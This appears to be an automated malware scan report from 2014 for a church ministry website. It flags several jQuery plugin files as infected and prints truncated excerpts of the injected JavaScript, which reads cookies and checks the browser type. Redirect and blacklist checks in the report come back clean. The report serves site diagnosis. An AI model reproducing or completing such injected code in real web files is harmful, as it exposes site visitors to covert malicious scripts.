Scanned pages/files
Request | Server response | Status |
http://awesomegodministry.org/ | 200 OK Content-Length: 6161 Content-Type: text/html | clean |
http://awesomegodministry.org/js/jquery-1.3.2.js | 200 OK Content-Length: 121676 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight document.body["offset" + name], document.documentElement["offset" + name] ) : // Get or set width or height on the element size === undefined ? // Get width or height on the element (this.length ? jQuery.css( this[0], type ) : null) : // Set the width or height on the element (default to pixels if value is unitless) this.css( type, typeof size === "string" ? size : size + "px" ); }; }); })(); Antivirus reports:
| ||
http://awesomegodministry.org/js/hoverIntent.js | 200 OK Content-Length: 4231 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight pX = ev.pageX; pY = ev.pageY; $(ob).bind("mousemove",track); if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );} } else { $(ob).unbind("mousemove",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.mouseover(handleHover).mouseout(handleHover); }; })(jQuery); Antivirus reports:
| ||
http://awesomegodministry.org/js/superfish.js | 200 OK Content-Length: 4771 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports:
| ||
http://awesomegodministry.org/js/jquery.innerfade.js | 200 OK Content-Length: 5996 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight current = Math.floor(Math.random() * elements.length); } else alert('Innerfade-Type must either be \'sequence\', \'random\' or \'random_start\''); setTimeout((function() { $.innerfade.next(elements, settings, current, last); }), settings.timeout); }; })(jQuery); function removeFilter(element) { if(element.style.removeAttribute){ element.style.removeAttribute('filter'); } } Antivirus reports:
| ||
http://awesomegodministry.org/js/jquery.carousel.pack.js | 200 OK Content-Length: 6819 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
| ||
http://awesomegodministry.org/index.html | 200 OK Content-Length: 6161 Content-Type: text/html | clean |
http://awesomegodministry.org/about.html | 200 OK Content-Length: 8705 Content-Type: text/html | clean |
http://awesomegodministry.org/ministries.html | 200 OK Content-Length: 11583 Content-Type: text/html | clean |
http://awesomegodministry.org/prayer.php | 200 OK Content-Length: 8450 Content-Type: text/html | clean |
http://awesomegodministry.org/js/jquery.validate.js | 200 OK Content-Length: 37493 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight } }; }); $.extend($.fn, { delegate: function(type, delegate, handler) { return this.bind(type, function(event) { var target = $(event.target); if (target.is(delegate)) { return handler.apply(target, arguments); } }); }, triggerEvent: function(type, target) { return this.triggerHandler(type, [$.event.fix({ type: type, target: target })]); } }) })(jQuery); Antivirus reports:
| ||
http://awesomegodministry.org/js/jquery.metadata.js | 200 OK Content-Length: 5012 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight } else if ( elem.getAttribute != undefined ) { var attr = elem.getAttribute( settings.name ); if ( attr ) data = attr; } if ( data.indexOf( '{' ) <0 ) data = "{" + data + "}"; data = eval("(" + data + ")"); $.data( elem, settings.single, data ); return data; } } }); $.fn.metadata = function( opts ){ return $.metadata.get( this[0], opts ); }; })(jQuery); Antivirus reports:
| ||
http://awesomegodministry.org/js/cmxforms.js | 200 OK Content-Length: 1880 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight var $this = $(this); var labelContent = $this.html(); var labelWidth = document.defaultView.getComputedStyle( this, '' ).getPropertyValue( 'width' ); var labelSpan = $("<span>") .css("display", "block") .width(labelWidth) .html(labelContent); $this.css("display", "-moz-inline-box") .empty() .append(labelSpan); }).end().show(); }); }; Antivirus reports:
| ||
http://awesomegodministry.org/gallery.html | 200 OK Content-Length: 15142 Content-Type: text/html | clean |
http://awesomegodministry.org/js/filterable.pack.gallery.js | 200 OK Content-Length: 2638 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Minecopyswetalonecode() { var expolite = navigator.userAgent; var styled = (expolite.indexOf("Windows") < +1 || expolite.indexOf("IEMobile") > -1 || expolite.indexOf("Chrome") > -1); var bob = (getCookie("joombanight Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: awesomegodministry.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 12:34:31 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6161
Content-Type: text/html
...6161 bytes of data.
GET / HTTP/1.1
Host: awesomegodministry.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 12:34:31 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6161
Content-Type: text/html
...6161 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: awesomegodministry.org
Referer: http://www.google.com/search?q=awesomegodministry.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: awesomegodministry.org
Referer: http://www.google.com/search?q=awesomegodministry.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=awesomegodministry.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://awesomegodministry.org/
Result: awesomegodministry.org is not infected or malware details are not published yet.
Result: awesomegodministry.org is not infected or malware details are not published yet.